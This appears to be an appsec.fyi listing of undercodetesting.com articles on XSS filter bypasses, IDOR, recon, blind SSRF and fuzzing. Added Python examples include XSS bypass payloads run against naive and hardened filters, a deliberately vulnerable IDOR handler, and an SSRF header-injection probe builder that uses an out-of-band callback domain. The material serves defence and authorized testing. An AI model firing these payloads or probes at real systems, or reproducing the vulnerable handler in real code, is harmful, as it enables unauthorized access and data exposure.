undercodetesting.com
Resources curated from this publisher and indexed across appsec.fyi topic pages. Last item added: 2026-04-19.
| Date Added | Topic | Resource | Excerpt |
|---|---|---|---|
| 2026-04-19 | XSS | XSS Payload Bypass Technique: A Practical Guide | Walkthrough of XSS filter bypasses that obfuscate a payload with mixed-case tag and attribute names and redundant slashes in place of spaces, so that an `onfocus` handler still fires once the filter lets the markup through. Mitigations covered are sanitizing untrusted HTML with DOMPurify before it is inserted into the DOM and deploying a Content Security Policy (CSP). The article also gives Linux and Windows commands for auditing logs and scanning directories for vulnerable scripts, and shows further payload encoding with Burp Decoder or base64. |
| 2026-04-17 | IDOR | Exploiting IDOR Vulnerabilities: Prevent Account Takeover | Analysis of Insecure Direct Object Reference (IDOR) flaws: an attacker tampers with an object identifier such as a `UserId` parameter in an HTTP request, found and replayed with Burp Suite or cURL, to read or change another user's data, up to full account takeover. Prevention is a server-side concern: authorize every object access against the identity bound to the session rather than the identifier the client supplies, and use unpredictable identifiers such as UUIDs in the schema so records cannot be enumerated (defence in depth, not a substitute for the authorization check). Logging suspicious access patterns and banning repeat offenders with Fail2Ban adds a detective layer. IDOR is an instance of Broken Access Control in the OWASP Top 10. |
| 2026-04-17 | Recon | The Ultimate Recon Arsenal: 25+ Commands for Bug Bounty Workflow | Library of 25+ reconnaissance commands for bug bounty workflows: subdomain enumeration with Amass and MassDNS, live-host discovery and service fingerprinting with HTTPX, directory brute-forcing with Feroxbuster, and endpoint extraction from JavaScript with LinkFinder. It chains these stages in a Bash workflow script and validates candidate findings with Nuclei, arguing that automation is what makes large-scale target mapping and attack-surface assessment practical. |
| 2026-04-10 | SSRF | Mastering Blind SSRF Detection With Burp Suite | Blind SSRF detection with Burp Suite: brute-forcing request headers with Intruder, confirming server-side requests out of band through Collaborator, and watching for interactions in real time with the Taborator extension. It covers payload strategies such as sweeping numeric ranges and enumerating cloud metadata endpoints, plus Python scripting against the Burp API to automate the workflow, and argues for proactive SSRF testing as cloud-focused exploitation grows. |
| 2026-04-10 | Fuzzing | Mastering Fuzzing For Vulnerability Research: A Practical Guide | Guide to fuzzing for vulnerability research: setting up AFL++ and WinAFL, writing a fuzzing harness, running the fuzzer against a target binary, and triaging crashes in GDB. It covers fixing findings such as stack overflows by replacing `strcpy` with bounded alternatives like `strncpy` (mind that `strncpy` does not NUL-terminate when the source fills the buffer, so write the terminator explicitly or use `snprintf`), and introduces in-process coverage-guided fuzzing with libFuzzer. |
| 2026-04-10 | XSS | XSS Payload WAF Bypass: Advanced Techniques to Evade Microsoft's 2025 Security | Advanced XSS payloads aimed at Microsoft's 2025 WAF rules: double-encoded HTML entities such as `&%2362;` (one URL-decode yields `&#62;`, which only a second, entity-aware decode turns into `>`) slip past a WAF that decodes a single layer, while array dereferencing and indirect property access break signatures that key on literal function names. It also swaps commonly monitored handlers like `onclick` for less-watched DOM event triggers such as `onchange`. |
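The two XSS entries above (mixed-case and slash obfuscation in the first, double-encoded entities and indirect property access in the last) share one lesson for the defender: a filter must canonicalize input at least as deeply as the application decodes it, and it should key on structure (a tag carrying any event handler) rather than on literal names like `alert(`. The following is an added example, not code from either article: a naive single-decode, case-sensitive signature check beside a canonicalizing check, run over constructed payloads. The decoding chain it mirrors (URL-decode, then HTML-entity decode, to a fixed point) is an assumption about the backend; the payloads and the benign control are constructed for the demo.

```python
import html
import re
from urllib.parse import unquote

# Naive WAF: decodes URL encoding once, is case-sensitive, and insists that an
# event handler be preceded by whitespace and that the tag be closed with '>'.
NAIVE_TAG = re.compile(r"<[a-zA-Z]+[^>]*\son[a-z]+=[^>]*>")

# Structural checks applied to the canonical form.
TAG_OPEN = re.compile(r"<\s*[a-z]")
EVENT_HANDLER = re.compile(r"\bon[a-z]+\s*=")


def naive_waf(raw: str) -> bool:
    """Single URL-decode, then a case-sensitive signature. Returns True if blocked."""
    return bool(NAIVE_TAG.search(unquote(raw)))


def canonicalize(raw: str, max_rounds: int = 5) -> str:
    """Decode to a fixed point (URL, then HTML entities), lowercase, and treat '/'
    like whitespace, as the HTML tokenizer does between attributes.
    Assumption: the backend decodes in this same order before rendering."""
    s = raw
    for _ in range(max_rounds):
        nxt = html.unescape(unquote(s))
        if nxt == s:
            break
        s = nxt
    s = s.lower()
    return re.sub(r"[/\s]+", " ", s)


def hardened_waf(raw: str) -> bool:
    """Block any tag that carries an event handler in canonical form, whatever the
    handler name or the JavaScript inside it. Returns True if blocked."""
    s = canonicalize(raw)
    return bool(TAG_OPEN.search(s) and EVENT_HANDLER.search(s))


# Constructed payloads (not from the articles) and a benign control.
SAMPLES = {
    "mixed-case + slashes": "<input//oNfOcUs=alert(1)//autofocus>",
    "double-encoded '>'": "%3Cimg src=x onerror=alert(1)&%2362;",
    "indirect property": "<img src=x onerror=self['al'+'ert'](1)>",
    "benign": "<b>hello</b> & goodbye",
}


def evaluate(samples=SAMPLES):
    """Return {name: (naive_blocked, hardened_blocked)} for each sample."""
    return {name: (naive_waf(p), hardened_waf(p)) for name, p in samples.items()}


if __name__ == "__main__":
    for name, (naive, hard) in evaluate().items():
        print(f"{name:22} naive={naive!s:5} canonical={hard}")
```

The naive check misses the first two samples: it never sees `onfocus=` because slashes are not whitespace and the case differs, and it never sees the closing `>` because it stops after one decode. The third sample is caught by both because the structural rule does not care that `alert` is spelled via string concatenation. The price of canonicalizing this aggressively is more false positives on free text, so a production rule set needs tuning against real traffic.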
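The IDOR entry above reduces to one missing check: the handler authenticates the session and then trusts the client-supplied `UserId`. The added example below (my code, not the article's) shows a vulnerable profile handler beside a hardened one that derives the caller from the session, resolves an opaque UUID to the internal record, denies and logs a mismatch, and treats the UUID as enumeration resistance rather than as access control. The user records, session tokens, role model and log line format are assumptions constructed for the demo; both handlers return an HTTP-style `(status, body)` tuple.

```python
import uuid

# Constructed data; the schema, tokens and user records are assumptions for the demo.
USERS = {
    "1001": {"email": "alice@example.test", "role": "user"},
    "1002": {"email": "bob@example.test", "role": "user"},
    "1003": {"email": "carol@example.test", "role": "admin"},
}
SESSIONS = {"sess-alice": "1001", "sess-bob": "1002", "sess-carol": "1003"}

# Opaque public identifiers: UUIDv4 -> internal sequential id. This hides the
# enumerable keyspace but is NOT the access control.
PUBLIC_IDS = {str(uuid.uuid4()): internal for internal in USERS}
PUBLIC_OF = {internal: public for public, internal in PUBLIC_IDS.items()}

AUDIT_LOG = []  # lines a tool like Fail2Ban could tail (constructed format)


def vulnerable_handler(session_token, requested_user_id):
    """GET /profile?UserId=... : authenticates the session, then trusts the
    client-supplied UserId. Any logged-in user can read any profile."""
    if session_token not in SESSIONS:
        return 401, None
    profile = USERS.get(requested_user_id)
    return (200, profile) if profile else (404, None)


def hardened_handler(session_token, requested_public_id, client_ip="203.0.113.7"):
    """Same endpoint with object-level authorization: the identity comes from the
    session, the identifier is opaque, and a mismatch is denied and logged."""
    caller = SESSIONS.get(session_token)
    if caller is None:
        return 401, None
    target = PUBLIC_IDS.get(requested_public_id)
    if target is None:
        return 404, None
    # The check that the vulnerable handler lacks: is the caller allowed to see
    # this object? Ownership or an explicit admin role, decided server-side.
    if target != caller and USERS[caller]["role"] != "admin":
        AUDIT_LOG.append(f"IDOR_DENIED ip={client_ip} caller={caller} target={target}")
        return 403, None
    return 200, USERS[target]


if __name__ == "__main__":
    # Bob reads Alice's profile through the vulnerable handler, then is refused.
    print(vulnerable_handler("sess-bob", "1001"))
    print(hardened_handler("sess-bob", PUBLIC_OF["1001"]))
    print(AUDIT_LOG)
```

Many APIs return 404 for both the unknown and the unauthorized case so that a response code never confirms an object exists; with unguessable identifiers that oracle matters less, and the 403 here keeps the denied access visible in the log, which is what the Fail2Ban-style banning in the article keys on.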
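The blind-SSRF entry above brute-forces request headers with Intruder and reads Collaborator for out-of-band hits. The added example below (my code, not the article's, and independent of Burp) shows the part that is easy to get wrong when automating it: giving every (target, header) probe its own subdomain so that a callback identifies the responsible header, sending URL-valued and host-valued headers in the form each expects, and parsing a callback log back to the header. The OOB domain, target URL, header list and log line format are assumptions; the log lines are constructed.

```python
import hashlib
import re

# Assumptions for the demo: OOB_DOMAIN stands in for your own Collaborator or
# interactsh payload domain, TARGET is a constructed endpoint, and the header
# lists are a starting set, not an exhaustive one.
OOB_DOMAIN = "x7q2k.oast.example"
TARGET = "https://app.example.test/api/export"

URL_HEADERS = ["Referer", "Origin", "X-Original-URL", "X-Wap-Profile", "Contact", "From"]
HOST_HEADERS = ["X-Forwarded-For", "X-Forwarded-Host", "X-Real-IP",
                "True-Client-IP", "CF-Connecting-IP", "X-Client-IP"]


def label_for(target: str, header: str) -> str:
    """Short deterministic label so each (target, header) pair gets its own subdomain."""
    return hashlib.sha256(f"{target}|{header}".encode()).hexdigest()[:12]


def build_probes(target: str = TARGET, oob: str = OOB_DOMAIN):
    """Return ([{'url', 'headers'}], {label: header}). One header per request,
    so a callback is attributable to exactly one header."""
    probes, index = [], {}
    for header in URL_HEADERS + HOST_HEADERS:
        label = label_for(target, header)
        host = f"{label}.{oob}"
        # URL-type headers get a full URL; IP/host-type headers get a bare hostname.
        value = f"http://{host}/" if header in URL_HEADERS else host
        probes.append({"url": target, "headers": {header: value}})
        index[label] = header
    return probes, index


# Constructed callback log format: "<timestamp> <DNS|HTTP> <hostname> from <source ip>"
CALLBACK_LINE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<kind>DNS|HTTP)\s+(?P<host>[\w.-]+)\s+from\s+(?P<src>\S+)$"
)


def correlate(log_lines, index, oob: str = OOB_DOMAIN):
    """Map OOB callbacks back to the header that caused them, ignoring noise."""
    hits = []
    for line in log_lines:
        m = CALLBACK_LINE.match(line.strip())
        if not m or not m["host"].lower().endswith("." + oob):
            continue
        label = m["host"].split(".")[0].lower()
        header = index.get(label)
        if header:
            hits.append({"header": header, "kind": m["kind"], "source": m["src"], "at": m["ts"]})
    return hits


def demo_log():
    """Constructed callback log: a DNS lookup for the Referer probe, an HTTP fetch
    for the X-Forwarded-For probe, and an unrelated line that must be ignored."""
    ref = label_for(TARGET, "Referer")
    xff = label_for(TARGET, "X-Forwarded-For")
    return [
        f"2026-04-10T12:00:01Z DNS {ref}.{OOB_DOMAIN} from 203.0.113.9",
        f"2026-04-10T12:00:02Z HTTP {xff}.{OOB_DOMAIN} from 203.0.113.9",
        "2026-04-10T12:00:03Z DNS scanner.someone-else.example from 198.51.100.4",
    ]


if __name__ == "__main__":
    probes, index = build_probes()
    for hit in correlate(demo_log(), index):
        print(f"{hit['header']:18} {hit['kind']:4} from {hit['source']} at {hit['at']}")
```

In use, each probe is sent as a single request with your HTTP client and the OOB service is polled for interactions. A DNS-only hit tells you the server resolved the name; an HTTP hit tells you it fetched the URL, which is the confirmation the article's follow-on strategies (numeric ranges, cloud metadata endpoints) build on. Keep the label deterministic, as here, so a callback that arrives hours later can still be attributed.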